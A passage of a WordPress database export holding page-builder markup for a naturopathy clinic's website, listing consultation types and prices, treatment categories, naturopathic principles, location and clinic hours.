body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_5\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"3-01\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></li>\n<li>Capsules/tablets<span style=\"font-family: Montserrat;\"></span></li>\n<li>Teas</li>\n<li>Topical preparations</li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Stress strategies</span></li>\n<li><span style=\"font-family: Montserrat;\">Exercise and movement</span></li>\n<li><span style=\"font-family: Montserrat;\">Mindfulness </span></li>\n<li><span style=\"font-family: Montserrat;\">Sleep support</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Stress strategies</span></li>\n<li><span style=\"font-family: Montserrat;\">Exercise and movement</span></li>\n<li><span style=\"font-family: Montserrat;\">Mindfulness </span></li>\n<li><span style=\"font-family: Montserrat;\">Sleep support</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-5.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span></li>\n</ul>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_image=\"off\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01-crop.png\" title_text=\"1-01 crop\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-25 11:01:13','2021-05-25 03:01:13','',28,'https://verde.desidrivers.com.au/?p=124',0,'revision','',0),(126,1,'2021-05-25 11:02:00','2021-05-25 03:02:00','','4-01','','inherit','open','closed','','4-01','','','2021-05-25 11:02:00','2021-05-25 03:02:00','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png',0,'attachment','image/png',0),(127,1,'2021-05-25 11:02:45','2021-05-25 03:02:45','','5-01','','inherit','open','closed','','5-01-2','','','2021-05-25 11:02:45','2021-05-25 03:02:45','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png',0,'attachment','image/png',0),(132,1,'2021-05-25 11:09:36','2021-05-25 03:09:36','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Choose from face-to-face and online Zoom consults.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" hover_enabled=\"0\" custom_padding=\"7px|||||\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"1-01\" align=\"center\" background_color=\"#ccd4c8\" hover_enabled=\"0\" sticky_enabled=\"0\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" border_width_all=\"1px\" sticky_enabled=\"0\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"3-01\" align=\"center\" custom_padding=\"30px||30px||false|false\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb image_last_edited=\"off|tablet\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_blurb][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"2-01\" align=\"center\" custom_padding=\"30px||30px||false|false\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" 